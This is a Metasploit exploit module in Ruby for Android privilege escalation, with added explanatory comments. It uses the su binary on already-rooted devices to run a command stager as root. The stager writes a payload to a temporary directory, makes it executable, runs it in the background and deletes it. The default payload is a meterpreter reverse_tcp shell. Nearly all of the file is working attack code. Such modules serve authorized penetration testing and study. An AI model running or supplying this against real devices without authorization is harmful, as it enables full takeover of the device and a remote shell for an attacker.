##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege-escalation module for already-rooted Android devices.
#
# It does not exploit a vulnerability: it relies on a pre-existing `su`
# binary and drives a Metasploit command stager through it. From the code and
# description below, the observable footprint is: every staged line runs via
# `<SU_BINARY> -c '...'`, the payload is written under WritableDir (default
# `/data/local/tmp/`), and on most devices the su binary prompts the user for
# permission — so the activity is visible both on-device and on the
# filesystem.
class MetasploitModule < Msf::Exploit::Local
  # Manual rank: needs an already-rooted device and (per the description) user
  # consent at the su prompt, so it is not suitable for automated runs.
  Rank = ManualRanking

  include Msf::Exploit::CmdStager     # provides execute_cmdstager
  include Msf::Post::File             # file helpers on the session
  include Msf::Post::Android::Priv    # provides is_root?

  # Registers module metadata and the two datastore options this module reads:
  # SU_BINARY (su executable, default 'su') and WritableDir (staging
  # directory, default '/data/local/tmp/').
  #
  # @param info [Hash] module info, merged through update_info
  def initialize(info={})
    super( update_info( info, {
      'Name' => "Android 'su' Privilege Escalation",
      'Description' => %q{
        This module uses the su binary present on rooted devices to run
        a payload as root.

        A rooted Android device will contain a su binary (often linked with
        an application) that allows the user to run commands as root.
        This module will use the su binary to execute a command stager
        as root. The command stager will write a payload binary to a
        temporary directory, make it executable, execute it in the background,
        and finally delete the executable.

        On most devices the su binary will pop-up a prompt on the device
        asking the user for permission.
      },
      'Author' => 'timwr',
      'License' => MSF_LICENSE,
      'DisclosureDate' => '2017-08-31',
      'SessionTypes' => [ 'meterpreter', 'shell' ],
      'Platform' => [ 'android', 'linux' ],
      'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
      # One target per supported architecture; the payload arch must match.
      'Targets' => [
        ['aarch64',{'Arch' => ARCH_AARCH64}],
        ['armle', {'Arch' => ARCH_ARMLE}],
        ['x86', {'Arch' => ARCH_X86}],
        ['x64', {'Arch' => ARCH_X64}],
        ['mipsle', {'Arch' => ARCH_MIPSLE}]
      ],
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
        'WfsDelay' => 5,
      },
      'DefaultTarget' => 0,
    }
    ))
    register_options([
      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
    ])
  end

  # Staging directory for the command stager, taken from WritableDir.
  #
  # @return [String]
  def base_dir
    datastore['WritableDir'].to_s
  end

  # The su executable (path or name) that every staged line is run through.
  #
  # @return [String]
  def su_bin
    datastore['SU_BINARY'].to_s
  end

  # Entry point. Refuses to run when the session is already root, then hands
  # off to the CmdStager using the echo/octal flavor, so the payload bytes are
  # emitted with `echo` on each line that execute_command wraps in `su -c`.
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    # Per-line length budget for the stager, reduced by the length of the su
    # binary name that execute_command prepends to every line. The 4088 base
    # is presumably the command-line length limit being targeted — TODO confirm.
    linemax = 4088 - su_bin.size
    execute_cmdstager({
      flavor: :echo,         # payload written with echo, one chunk per line
      enc_format: :octal,    # bytes encoded as octal escapes
      prefix: '\\\\0',       # single-quoted, so the runtime escape prefix is \\0
      temp: base_dir,        # staging directory from WritableDir
      linemax: linemax,
      background: true,      # payload is launched in the background
    })
  end

  # Hook invoked by the CmdStager for each staged line: wraps the line as
  # `<SU_BINARY> -c '<cmd>'` and runs it on the session.
  #
  # @param cmd [String] one stager command line
  # @param opts [Hash] stager options (not used here)
  # @return the value returned by cmd_exec
  def execute_command(cmd, opts)
    # cmd is embedded in single quotes; assumes the stager never emits a
    # literal single quote — TODO confirm.
    su_cmd = "#{su_bin} -c '#{cmd}'"
    cmd_exec(su_cmd)
  end

end